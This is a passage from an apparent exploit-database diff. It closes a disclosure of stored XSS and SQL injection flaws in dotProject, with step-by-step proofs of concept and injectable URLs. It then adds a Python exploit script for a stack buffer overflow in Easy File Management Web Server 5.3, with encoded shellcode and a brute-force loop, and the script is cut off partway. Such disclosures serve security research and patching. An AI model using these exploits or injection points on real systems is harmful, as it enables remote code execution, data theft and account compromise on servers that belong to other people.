+of dotProject to XSS attacks.
+
+== Task Log ===
+The task log creation screen fails to filter form details before
+creating a new task log.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a task
+2. Click the 'Tasks' link in the top navigation bar
+3. Click on a task name to which the user account has permissions
+4. Click the 'New Log' tab
+5. Fill in "" for the 'Summary', and
+'Description' fields, enter "">" for
+the 'URL' field
+6. Click the 'update task' button in the lower right hand corner
+7. On the resulting screen the task name XSS will appear.
+8. To view the other task log XSS attacks browse to
+index.php?m=tasks&a=view&task_id=X where 'X' is the id of the task.
+
+Impact
+Any user with the permissions to create new task logs (virtually all
+dotProject users) can expose other users of dotProject to XSS attacks.
+
+== Files ===
+The file attachment screen fails to filter form details before creating
+a new file attachment.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a file
+2. Click the 'Files' link in the top navigation bar
+3. Click on a 'new folder' button in the upper right
+4. Fill in "" for the 'Folder Name', and
+'Description' fields
+5. Click on the 'new file' button in the upper right
+6. Observer the 'Folder name' XSS
+7. Fill in "" for the 'Description' field
+and choose a file to upload
+8. Click the 'submit' button in the lower right hand corner
+9. On the resulting screen the file description XSS will appear.
+
+Impact
+Any user with the permissions to create new files can expose other users
+of dotProject to XSS attacks.
+
+== Events ===
+The events screen fails to filter form details before creating a new events.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create an event
+2. Select 'Event' from the '-New Item-' drop down in the upper right or
+navigate to index.php?m=calendar&a=addedit
+3. Fill in "" for the 'Event Title', and
+'Description' fields
+4. Click on the 'submit' button in the lower right
+5. Observe the XSS at the View Event screen
+index.php?m=calendar&a=view&event_id=X where 'X' is the id of the new event.
+
+Impact
+Any user with the permissions to create new events can expose other
+users of dotProject to XSS attacks.
+
+== Contacts ===
+The contacts screen fails to filter form details before creating a new
+events.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a new contact
+2. Select 'Contact' from the '-New Item-' drop down in the upper right
+or navigate to index.php?m=contacts&a=addedit
+3. Fill in "" for every field
+4. Click on the 'submit' button in the lower right
+5. Observe the XSS at the View Contact screen
+index.php?m=contacts&a=view&contact_id=X where 'X' is the id of the new
+contact.
+
+Impact
+Any user with the permissions to create new contacts can expose other
+users of dotProject to XSS attacks.
+
+== Tickets ===
+The Submit Trouble Ticket screen fails to filter form details before
+creating a new ticket.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a new ticket
+2. Click the 'Tickets' link in the top navigation bar or navigate to
+index.php?m=ticketsmith&a=post_ticket
+3. Fill in "" for the 'E-mail' field
+4. Click on the 'submit' button in the lower right
+5. Observe the XSS at the View Contact screen
+index.php?m=ticketsmith&a=view&ticket=X where 'X' is the id of the new
+contact.
+
+Impact
+Any user with the permissions to create new tickets can expose other
+users of dotProject to XSS attacks.
+
+== Forums ===
+The Add Forum screen fails to filter form details before creating a new
+forum.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a new forum
+2. Click the 'Forums' link in the top navigation bar or navigate to
+index.php?m=forums&a=post_ticket
+3. Fill in "" for the 'Forum Name' and
+'Description' fields
+4. Click on the 'submit' button in the lower right
+5. Observe the XSS at the Forums screen index.php?m=forums
+
+Impact
+Any user with the permissions to create new tickets can expose other
+users of dotProject to XSS attacks.
+
+== Forum Topics ===
+The Forum Add Message screen fails to filter form details before
+creating a new topic.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a new forum
+topic
+2. Click the 'Forums' link in the top navigation bar or navigate to
+index.php?m=forums
+3. Click on the name of a forum
+4. Click on the 'start a new topic' button in the upper right
+5. Fill in "" for the 'Subject' and
+'Message' fields
+4. Click on the 'submit' button in the lower right
+5. Observe the XSS at the Forums topics screen or
+index.php?m=forums&a=viewer&forum_id=2&message_id=X where 'X' is the id
+of the topic
+
+Impact
+Any user with the permissions to create new tickets can expose other
+users of dotProject to XSS attacks.
+
+
+
+SQL Injection Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+SQL injection vulnerabilities could allow an attacker to expose
+sensitive data, such as password hashes, alter the database contents to
+introduce stored XSS vulnerabilities, reset administrative user
+passwords to allow escalation of privilege and other attacks that could
+lead to the compromise of data, user account credentials, or even the
+web server.
+
+The following URL's expose PHP functions that are vulnerable to SQL
+injection:
+
+
+index.php?m=departments&a=addedit&company_id=1'
+index.php?m=ticketsmith&a=view&ticket=1'
+index.php?m=files&a=index&tab=4&folder=1'
+
+Additionally some forms allow for SQL injection:
+
+* The ticket creation form index.php?m=ticketsmith&a=post_ticket does
+not properly sanitize single quotes in the Name or Email fields
diff --git a/platforms/windows/remote/33453.py b/platforms/windows/remote/33453.py
new file mode 100755
index 000000000..b31aee2a3
--- /dev/null
+++ b/platforms/windows/remote/33453.py
@@ -0,0 +1,90 @@ +#!/usr/bin/env python + +# Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow +# Date: 19 May 2014 +# Exploit Author: superkojiman - http://www.techorganic.com +# Vendor Homepage: http://www.efssoft.com +# Software Link: http://www.web-file-management.com/download.php +# Version: 5.3 +# Tested on: English version of Windows XP Professional SP2 and SP3 +# +# Description: +# By setting UserID in the cookie to a long string, we can overwrite EDX which +# allows us to control execution flow when the following instruction is +# executed: +# +# 0x00468702: call dword ptr [edx+28h] +# +# Very similar to Easy File Sharing Web Server 6.8 exploit here: +# http://www.exploit-db.com/exploits/33352/ +# I suspect their other web server solutions might be vulnerable to a similar +# overflow. +# +# Tested with Easy File Management Web Server installed in the default location +# at C:\EFS Software\Easy File Management Web Server + + +import socket +import struct +import sys + +target = "172.16.229.134" +port = 80 + +# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ +# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin +# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) +shellcode = ( +"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + +"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + +"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + +"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + +"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + +"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + +"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + +"\x1c\x39\xbd" +) + +for i in xrange(1,255): + n = "" + if i < 16: + n = "0" + hex(i)[-1] + else: + n = hex(i)[2:] + + # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28] + # only second byte changes in the stack address changes, so we can brute + # force it + guess = "0x01" + 
n + "9898" + print "trying", guess + + payload = "A"*20 # padding + payload += struct.pack("